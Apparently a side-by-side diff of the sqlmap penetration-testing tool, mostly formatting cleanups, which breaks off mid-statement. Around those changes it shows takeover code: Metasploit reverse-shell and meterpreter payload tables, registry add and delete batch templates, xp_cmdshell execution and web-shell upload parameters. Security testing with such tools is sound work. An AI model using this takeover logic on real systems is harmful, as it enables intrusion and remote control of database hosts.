windows.add_option("--reg-key", dest="regKey", windows.add_option("--reg-key", dest="regKey",
help="Windows registry key") help="Windows registry key")
windows.add_option("--reg-value", dest="regVal", windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value") help="Windows registry key value")
windows.add_option("--reg-data", dest="regData", windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data") help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType", windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type") help="Windows registry key value type")
# General options # General options
general = OptionGroup(parser, "General", "These options can be used " general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
"to set some general working parameters")
general.add_option("-s", dest="sessionFile", general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file") help="Load session from a stored (.sqlite) file")
general.add_option("-t", dest="trafficFile", general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a " help="Log all HTTP traffic into a textual file")
"textual file")
general.add_option("--batch", dest="batch", general.add_option("--batch", dest="batch", action="store_true",
action="store_true", help="Never ask for user input, use the default behavior")
help="Never ask for user input, use the default behavior")
general.add_option("--binary-fields", dest="binaryFields", general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")") help="Result fields having binary values (e.g. \"digest\")")
general.add_option("--check-internet", dest="checkInternet", general.add_option("--check-internet", dest="checkInternet", action="store_true",
action="store_true", help="Check Internet connection before assessing the target")
help="Check Internet connection before assessing the target")
general.add_option("--crawl", dest="crawlDepth", type="int", general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL") help="Crawl the website starting from the target URL")
general.add_option("--crawl-exclude", dest="crawlExclude", general.add_option("--crawl-exclude", dest="crawlExclude",
help="Regexp to exclude pages from crawling (e.g. \"logout\")") help="Regexp to exclude pages from crawling (e.g. \"logout\")")
general.add_option("--csv-del", dest="csvDel", general.add_option("--csv-del", dest="csvDel",
help="Delimiting character used in CSV output " help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
"(default \"%s\")" % defaults.csvDel)
general.add_option("--charset", dest="charset", general.add_option("--charset", dest="charset",
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
general.add_option("--dump-format", dest="dumpFormat", general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)") help="Format of dumped data (CSV (default), HTML or SQLITE)")
general.add_option("--encoding", dest="encoding", general.add_option("--encoding", dest="encoding",
help="Character encoding used for data retrieval (e.g. GBK)") help="Character encoding used for data retrieval (e.g. GBK)")
general.add_option("--eta", dest="eta", general.add_option("--eta", dest="eta", action="store_true",
action="store_true", help="Display for each output the estimated time of arrival")
help="Display for each output the estimated time of arrival")
general.add_option("--flush-session", dest="flushSession", general.add_option("--flush-session", dest="flushSession", action="store_true",
action="store_true", help="Flush session files for current target")
help="Flush session files for current target")
general.add_option("--forms", dest="forms", general.add_option("--forms", dest="forms", action="store_true",
action="store_true", help="Parse and test forms on target URL")
help="Parse and test forms on target URL")
general.add_option("--fresh-queries", dest="freshQueries", general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
action="store_true", help="Ignore query results stored in session file")
help="Ignore query results stored in session file")
general.add_option("--har", dest="harFile", general.add_option("--har", dest="harFile",
help="Log all HTTP traffic into a HAR file") help="Log all HTTP traffic into a HAR file")
general.add_option("--hex", dest="hexConvert", general.add_option("--hex", dest="hexConvert", action="store_true",
action="store_true", help="Use DBMS hex function(s) for data retrieval")
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--output-dir", dest="outputDir", general.add_option("--output-dir", dest="outputDir", action="store",
action="store", help="Custom output directory path")
help="Custom output directory path")
general.add_option("--parse-errors", dest="parseErrors", general.add_option("--parse-errors", dest="parseErrors", action="store_true",
action="store_true", help="Parse and display DBMS error messages from responses")
help="Parse and display DBMS error messages from responses")
general.add_option("--save", dest="saveConfig", general.add_option("--save", dest="saveConfig",
help="Save options to a configuration INI file") help="Save options to a configuration INI file")
general.add_option("--scope", dest="scope", general.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log") help="Regexp to filter targets from provided proxy log")
@ -697,77 +601,65 @@ def cmdLineParser(argv=None):
general.add_option("--test-skip", dest="testSkip", general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll", general.add_option("--update", dest="updateAll", action="store_true",
action="store_true", help="Update sqlmap")
help="Update sqlmap")
# Miscellaneous options # Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous") miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("-z", dest="mnemonics", miscellaneous.add_option("-z", dest="mnemonics",
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
miscellaneous.add_option("--alert", dest="alert", miscellaneous.add_option("--alert", dest="alert",
help="Run host OS command(s) when SQL injection is found") help="Run host OS command(s) when SQL injection is found")
miscellaneous.add_option("--answers", dest="answers", miscellaneous.add_option("--answers", dest="answers",
help="Set question answers (e.g. \"quit=N,follow=N\")") help="Set question answers (e.g. \"quit=N,follow=N\")")
miscellaneous.add_option("--beep", dest="beep", action="store_true", miscellaneous.add_option("--beep", dest="beep", action="store_true",
help="Beep on question and/or when SQL injection is found") help="Beep on question and/or when SQL injection is found")
miscellaneous.add_option("--cleanup", dest="cleanup", miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
action="store_true", help="Clean up the DBMS from sqlmap specific UDF and tables")
help="Clean up the DBMS from sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--dependencies", dest="dependencies", miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
action="store_true", help="Check for missing (non-core) sqlmap dependencies")
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--disable-coloring", dest="disableColoring", miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
action="store_true", help="Disable console output coloring")
help="Disable console output coloring")
miscellaneous.add_option("--gpage", dest="googlePage", type="int", miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number") help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf", miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection")
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile", miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
action="store_true", help="Imitate smartphone through HTTP User-Agent header")
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--offline", dest="offline", miscellaneous.add_option("--offline", dest="offline", action="store_true",
action="store_true", help="Work in offline mode (only use session data)")
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--purge-output", dest="purgeOutput", miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true",
action="store_true", help="Safely remove all content from output directory")
help="Safely remove all content from output directory")
miscellaneous.add_option("--skip-waf", dest="skipWaf", miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
action="store_true", help="Skip heuristic detection of WAF/IPS/IDS protection")
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--smart", dest="smart", miscellaneous.add_option("--smart", dest="smart", action="store_true",
action="store_true", help="Conduct thorough tests only if positive heuristic(s)")
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
help="Prompt for an interactive sqlmap shell") help="Prompt for an interactive sqlmap shell")
miscellaneous.add_option("--tmp-dir", dest="tmpDir", miscellaneous.add_option("--tmp-dir", dest="tmpDir",
help="Local directory for storing temporary files") help="Local directory for storing temporary files")
miscellaneous.add_option("--web-root", dest="webRoot", miscellaneous.add_option("--web-root", dest="webRoot",
help="Web server document root directory (e.g. \"/var/www\")") help="Web server document root directory (e.g. \"/var/www\")")
miscellaneous.add_option("--wizard", dest="wizard", miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
action="store_true", help="Simple wizard interface for beginner users")
help="Simple wizard interface for beginner users")
# Hidden and/or experimental options # Hidden and/or experimental options
parser.add_option("--dummy", dest="dummy", action="store_true", parser.add_option("--dummy", dest="dummy", action="store_true",
@ -976,9 +868,7 @@ def cmdLineParser(argv=None):
if args.dummy: if args.dummy:
args.url = args.url or DUMMY_URL args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)):
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n" errMsg += "use -h for basic or -hh for advanced help\n"
parser.error(errMsg) parser.error(errMsg)

12
lib/parse/headers.py
View File

@ -24,18 +24,16 @@ def headersParser(headers):
if not kb.headerPaths: if not kb.headerPaths:
kb.headerPaths = { kb.headerPaths = {
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
} }
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
value = headers[header] value = headers[header]
xmlfile = kb.headerPaths[header] xmlfile = kb.headerPaths[header]
handler = FingerprintHandler(value, kb.headersFp) handler = FingerprintHandler(value, kb.headersFp)
parseXmlFile(xmlfile, handler) parseXmlFile(xmlfile, handler)
parseXmlFile(paths.GENERIC_XML, handler) parseXmlFile(paths.GENERIC_XML, handler)

6
lib/request/basic.py
View File

@ -110,7 +110,9 @@ def forgeHeaders(items=None, base=None):
kb.mergeCookies = readInput(message, default='Y', boolean=True) kb.mergeCookies = readInput(message, default='Y', boolean=True)
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) def _(value):
return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
if PLACE.COOKIE in conf.parameters: if PLACE.COOKIE in conf.parameters:
@ -161,7 +163,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding return encoding
# Reference: http://www.destructor.de/charsets/index.htm # Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('): for delimiter in (';', ',', '('):
if delimiter in encoding: if delimiter in encoding:

45
lib/request/connect.py
View File

@ -187,8 +187,7 @@ class Connect(object):
if not kb.dnsMode and conn: if not kb.dnsMode and conn:
headers = conn.info() headers = conn.info()
if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
warnMsg = "large compressed response detected. Disabling compression" warnMsg = "large compressed response detected. Disabling compression"
@ -241,27 +240,27 @@ class Connect(object):
kb.requestCounter += 1 kb.requestCounter += 1
threadData.lastRequestUID = kb.requestCounter threadData.lastRequestUID = kb.requestCounter
url = kwargs.get("url", None) or conf.url url = kwargs.get("url", None) or conf.url
get = kwargs.get("get", None) get = kwargs.get("get", None)
post = kwargs.get("post", None) post = kwargs.get("post", None)
method = kwargs.get("method", None) method = kwargs.get("method", None)
cookie = kwargs.get("cookie", None) cookie = kwargs.get("cookie", None)
ua = kwargs.get("ua", None) or conf.agent ua = kwargs.get("ua", None) or conf.agent
referer = kwargs.get("referer", None) or conf.referer referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False) direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None) multipart = kwargs.get("multipart", None)
silent = kwargs.get("silent", False) silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True) raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout timeout = kwargs.get("timeout", None) or conf.timeout
auxHeaders = kwargs.get("auxHeaders", None) auxHeaders = kwargs.get("auxHeaders", None)
response = kwargs.get("response", False) response = kwargs.get("response", False)
ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
refreshing = kwargs.get("refreshing", False) refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False) retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False) crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False) checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False) skipRead = kwargs.get("skipRead", False)
if multipart: if multipart:
post = multipart post = multipart
@ -1040,7 +1039,7 @@ class Connect(object):
name = safeVariableNaming(name) name = safeVariableNaming(name)
elif name in keywords: elif name in keywords:
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
variables[name] = value variables[name] = value
if cookie: if cookie:

2
lib/request/httpshandler.py
View File

@ -48,7 +48,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"):
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
try: try:
sock = create_sock() sock = create_sock()

5
lib/request/inject.py
View File

@ -175,10 +175,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
# forge the SQL limiting the query output one entry at a time # forge the SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table # NOTE: we assume that only queries that get data from a table
# can return multiple entries # can return multiple entries
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
if limitCond: if limitCond:

1
lib/request/templates.py
View File

@ -19,4 +19,3 @@ def getPageTemplate(payload, place):
retVal = kb.pageTemplates[(payload, place)] retVal = kb.pageTemplates[(payload, place)]
return retVal return retVal

6
lib/takeover/abstraction.py
View File

@ -172,9 +172,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
inject.goStacked(expression) inject.goStacked(expression)
# TODO: add support for PostgreSQL # TODO: add support for PostgreSQL
#elif Backend.isDbms(DBMS.PGSQL): # elif Backend.isDbms(DBMS.PGSQL):
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
# inject.goStacked(expression) # inject.goStacked(expression)
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
self._initRunAs() self._initRunAs()

104
lib/takeover/metasploit.py
View File

@ -81,6 +81,7 @@ class Metasploit:
_ = normalizePath(os.path.join(_, "..")) _ = normalizePath(os.path.join(_, ".."))
if _ == old: if _ == old:
break break
self._msfCli = "%s & ruby %s" % (_, self._msfCli) self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
self._msfEncode = "ruby %s" % self._msfEncode self._msfEncode = "ruby %s" % self._msfEncode
@ -88,60 +89,60 @@ class Metasploit:
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
self._msfPayloadsList = { self._msfPayloadsList = {
"windows": { "windows": {
1: ("Meterpreter (default)", "windows/meterpreter"), 1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"), 2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"), 3: ("VNC", "windows/vncinject"),
}, },
"linux": { "linux": {
1: ("Shell (default)", "linux/x86/shell"), 1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"), 2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
} }
} }
self._msfConnectionsList = { self._msfConnectionsList = {
"windows": { "windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}, },
"linux": { "linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
} }
} }
self._msfEncodersList = { self._msfEncodersList = {
"windows": { "windows": {
1: ("No Encoder", "generic/none"), 1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"), 9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"), 10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
} }
} }
self._msfSMBPortsList = { self._msfSMBPortsList = {
"windows": { "windows": {
1: ("139/TCP", "139"), 1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"), 2: ("445/TCP (default)", "445"),
} }
} }
self._portData = { self._portData = {
"bind": "remote port number", "bind": "remote port number",
"reverse": "local port number", "reverse": "local port number",
} }
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
@ -484,10 +485,13 @@ class Metasploit:
send_all(proc, "use espia\n") send_all(proc, "use espia\n")
send_all(proc, "use incognito\n") send_all(proc, "use incognito\n")
# This extension is loaded by default since Metasploit > 3.7
#send_all(proc, "use priv\n") # This extension is loaded by default since Metasploit > 3.7:
# This extension freezes the connection on 64-bit systems # send_all(proc, "use priv\n")
#send_all(proc, "use sniffer\n")
# This extension freezes the connection on 64-bit systems:
# send_all(proc, "use sniffer\n")
send_all(proc, "sysinfo\n") send_all(proc, "sysinfo\n")
send_all(proc, "getuid\n") send_all(proc, "getuid\n")

18
lib/takeover/registry.py
View File

@ -33,19 +33,19 @@ class Registry:
readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
self._batRead = ( self._batRead = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
readParse, readParse,
) )
self._batAdd = ( self._batAdd = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
) )
self._batDel = ( self._batDel = (
"@ECHO OFF\r\n", "@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
) )
def _createLocalBatchFile(self): def _createLocalBatchFile(self):
self._batPathFp = open(self._batPathLocal, "w") self._batPathFp = open(self._batPathLocal, "w")

8
lib/takeover/web.py
View File

@ -112,10 +112,10 @@ class Web:
if self.webApi in getPublicTypeMembers(WEB_API, True): if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = { multipartParams = {
"upload": "1", "upload": "1",
"file": stream, "file": stream,
"uploadDir": directory, "uploadDir": directory,
} }
if self.webApi == WEB_API.ASPX: if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION

2
lib/takeover/xp_cmdshell.py
View File

@ -214,7 +214,7 @@ class XP_cmdshell:
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
output = inject.getValue(query, resumeValue=False, blind=False, time=False) output = inject.getValue(query, resumeValue=False, blind=False, time=False)
if (output is None) or len(output)==0 or output[0] is None: if (output is None) or len(output) == 0 or output[0] is None:
output = [] output = []
count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

2
lib/techniques/blind/inference.py
View File

@ -611,7 +611,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# If we had no luck with commonValue and common charset, # If we had no luck with commonValue and common charset,
# use the returned other charset # use the returned other charset
if not val: if not val:
val = getChar(index, otherCharset, otherCharset==asciiTbl) val = getChar(index, otherCharset, otherCharset == asciiTbl)
else: else:
val = getChar(index, asciiTbl, not(charsetType is None and conf.charset)) val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))

30
lib/techniques/error/use.py
View File

@ -133,20 +133,23 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based # Parse the returned page to get the exact error-based
# SQL injection output # SQL injection output
output = reduce(lambda x, y: x if x is not None else y, (\ output = reduce(lambda x, y: x if x is not None else y, (
extractRegexResult(check, page), \ extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), \ extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)),
None) None
)
if output is not None: if output is not None:
output = getUnicode(output) output = getUnicode(output)
else: else:
trimmed = extractRegexResult(trimcheck, page) \ trimmed = (
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ extractRegexResult(trimcheck, page) or
